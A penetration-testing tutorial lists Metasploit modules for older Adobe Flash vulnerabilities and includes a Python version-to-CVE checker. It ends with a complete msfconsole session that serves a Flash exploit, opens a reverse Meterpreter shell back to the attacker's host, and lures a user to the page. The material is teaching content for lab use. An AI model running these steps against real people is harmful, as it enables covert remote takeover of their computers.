05- Metasploit Basics- Attacking Flash
In 03- Metasploit Basics- Attacking the Browser, we saw how to perform attacks against both the Internet Explorer and Firefox browsers, on both Windows and Linux operating systems. Attacks against users of these browsers do not have to be limited to the browser itself. Most browsers use one or more plugins to handle specialized content. Adobe Flash is a plugin that allows certain kinds of active content to be displayed directly in a browser. It has been subject to a number of attacks, and there are a number of Metasploit modules that target it.
As we saw when attacking the browser, it is critical to know something about the target when selecting an exploit; the modules are tailored to particular combinations of browser and Flash version. Moreover, some modules, especially older ones, only work against Windows XP targets. Since Windows XP is now past its end-of-life, we will not discuss modules that only impact Windows XP. Note that this does not mean that the underlying flaw could not be exploited on other machines, only that the Metasploit module is ineffective against non-XP targets.
If you want to test one or more of these modules, remember that you can get copies of old and out-of-date versions of Adobe Flash directly from Adobe.
Metasploit Modules for Adobe Flash
- Adobe Flash Player AVM Bytecode Verification Vulnerability
- CVE-2011-0609
- Flash 10, <=10.2.152.33
- Vulnerable: IE6, IE7, or Firefox 3.6
- Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
- CVE-2011-0611
- Flash 10, <=10.2.153.1
- Vulnerable:
- Windows Vista, IE7
- Windows 7, IE8
- Adobe Flash Player AVM Verification Logic Array Indexing Code Execution
- CVE-2011-2110
- Flash 10, <=10.3.181.23
- Vulnerable: IE6, IE7, IE8, Firefox 10.
- Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
- CVE-2011-2140
- Flash 10, <=10.3.181.25
- Vulnerable: IE7
- Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow
- CVE-2012-1535
- Flash 11, < 11.3.300.271
- Vulnerable: IE7, IE8, IE9
- Requires Java on the target for the ROP chain.
- Adobe Flash Player Regular Expression Heap Overflow
- CVE-2013-0634
- Flash 11.5, <11.5.502.149
- Vulnerable: IE8
- Note: The module notes (and list of targets) list Windows 7 SP1 but do not list Windows 7 SP0. Fret not, it works if SP1 is not installed.
- Adobe Flash Player Integer Underflow Remote Code Execution
- CVE-2014-0497
- Flash 11, 12 <12.0.0.43
- Note that on Windows 8 SP0, IE 10 ships with Flash 11.3.372, which is vulnerable to this exploit. Moreover, this does not require other software on the target for a ROP chain.
- Adobe Flash Player Shader Buffer Overflow
- CVE-2014-0515
- Flash 11, 12, 13 <13.0.0.182
- Note that on Windows 8 SP0, IE 10 ships with Flash 11.3.372, which is vulnerable to this exploit. Moreover, this does not require other software on the target for a ROP chain.
- Adobe Flash Player Type Confusion Remote Code Execution
- CVE-2013-5331
- Flash 11.7, 11.8, 11.9 <11.9.900.170
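As an added example (not part of the original handout), the following Python check encodes the version constraints from the list above and reports which of these modules' CVEs cover a given Flash build. It considers the Flash version only, not the browser or operating-system conditions, and assumes version strings are dotted integers as written in the list.

```python
# Added example: map a Flash build to the CVEs above whose stated range covers it.
from typing import List, Tuple

# (CVE, affected major/minor families, upper bound, bound is inclusive?)
# Constraints transcribed from the module list in this handout.
FLASH_MODULES: List[Tuple[str, Tuple[str, ...], str, bool]] = [
    ("CVE-2011-0609", ("10",), "10.2.152.33", True),
    ("CVE-2011-0611", ("10",), "10.2.153.1", True),
    ("CVE-2011-2110", ("10",), "10.3.181.23", True),
    ("CVE-2011-2140", ("10",), "10.3.181.25", True),
    ("CVE-2012-1535", ("11",), "11.3.300.271", False),
    ("CVE-2013-0634", ("11.5",), "11.5.502.149", False),
    ("CVE-2014-0497", ("11", "12"), "12.0.0.43", False),
    ("CVE-2014-0515", ("11", "12", "13"), "13.0.0.182", False),
    ("CVE-2013-5331", ("11.7", "11.8", "11.9"), "11.9.900.170", False),
]


def parse_version(v: str) -> Tuple[int, ...]:
    """Turn '11.3.372' into (11, 3, 372); non-numeric components raise ValueError."""
    return tuple(int(p) for p in v.strip().split("."))


def version_cmp(a: Tuple[int, ...], b: Tuple[int, ...]) -> int:
    """Compare dotted versions of different lengths; missing trailing
    components count as zero, so 11.3 == 11.3.0.0."""
    width = max(len(a), len(b))
    a, b = a + (0,) * (width - len(a)), b + (0,) * (width - len(b))
    return (a > b) - (a < b)


def in_family(version: Tuple[int, ...], family: str) -> bool:
    """True if the version's leading components match the family prefix (e.g. '11.5')."""
    prefix = parse_version(family)
    return version[: len(prefix)] == prefix


def vulnerable_cves(flash_version: str) -> List[str]:
    """Return the CVEs from FLASH_MODULES whose stated range covers flash_version."""
    ver = parse_version(flash_version)
    hits = []
    for cve, families, bound, inclusive in FLASH_MODULES:
        if not any(in_family(ver, f) for f in families):
            continue
        c = version_cmp(ver, parse_version(bound))
        if c < 0 or (inclusive and c == 0):
            hits.append(cve)
    return hits


if __name__ == "__main__":
    # The handout notes that Windows 8 SP0 / IE 10 ships Flash 11.3.372.
    print(vulnerable_cves("11.3.372"))  # ['CVE-2014-0497', 'CVE-2014-0515']
```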
After looking these over, if you ask me which are my favorites, they are clearly Adobe Flash Player Integer Underflow Remote Code Execution and Adobe Flash Player Shader Buffer Overflow. Both are robust and work on a wider range of modern systems. Add to that the fact that they work reliably on a stock Windows 8 system, and I am sold.
Let’s demonstrate one in action:
msf > use exploit/windows/browser/adobe_flash_pixel_bender_bof
msf exploit(adobe_flash_pixel_bender_bof) > set uripath bob
uripath => bob
msf exploit(adobe_flash_pixel_bender_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_pixel_bender_bof) > set lhost 10.0.1.26
lhost => 10.0.1.26
msf exploit(adobe_flash_pixel_bender_bof) > show options

Module options (exploit/windows/browser/adobe_flash_pixel_bender_bof):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Retries     false            no        Allow the browser to retry the module
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     bob              no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     10.0.1.26        yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(adobe_flash_pixel_bender_bof) > exploit -j
[*] Exploit running as background job.
msf exploit(adobe_flash_pixel_bender_bof) >
[*] Started reverse handler on 10.0.1.26:4444
[*] Using URL: http://0.0.0.0:8080/bob
[*] Local IP: http://10.0.1.26:8080/bob
[*] Server started.
msf exploit(adobe_flash_pixel_bender_bof) >
[*] 10.0.2.2 adobe_flash_pixel_bender_bof - Gathering target information.
[*] 10.0.2.2 adobe_flash_pixel_bender_bof - Sending response HTML.
[*] 10.0.2.2 adobe_flash_pixel_bender_bof - Request: /bob/dVUXen/
[*] 10.0.2.2 adobe_flash_pixel_bender_bof - Sending HTML...
[*] 10.0.2.2 adobe_flash_pixel_bender_bof - Request: /bob/dVUXen/MFbh.swf
[*] 10.0.2.2 adobe_flash_pixel_bender_bof - Sending SWF...
[*] Sending stage (770048 bytes) to 10.0.2.2
[*] Meterpreter session 1 opened (10.0.1.26:4444 -> 10.0.2.2:56351) at 2014-06-04 20:19:29 -0400
msf exploit(adobe_flash_pixel_bender_bof) > sessions -l

Active sessions
===============

  Id  Type                   Information              Connection
  --  ----                   -----------              ----------
  1   meterpreter x86/win32  APOLLO\zathras @ APOLLO  10.0.1.26:4444 -> 10.0.2.2:56351 (10.0.2.8)

msf exploit(adobe_flash_pixel_bender_bof) >
The process is the same as what we saw for browser attacks. In this case I updated the URI (who would think "bob" would be malicious ☺; besides, it is easier to type). I again used a reverse Meterpreter shell for the payload, with the listening host set to the IP address of my attack system. Automatic targeting works well for this module. Run the exploit, and get the user to visit the web page. The shell pops quite quickly.